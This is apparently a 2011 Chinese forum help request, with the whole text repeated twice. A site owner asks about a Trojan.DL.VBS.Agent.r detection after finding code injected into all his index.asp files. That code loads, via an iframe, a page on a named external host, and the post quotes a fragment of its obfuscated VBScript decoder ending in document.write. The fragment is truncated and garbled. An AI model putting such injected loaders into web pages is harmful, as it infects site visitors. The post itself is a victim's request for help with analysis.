Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。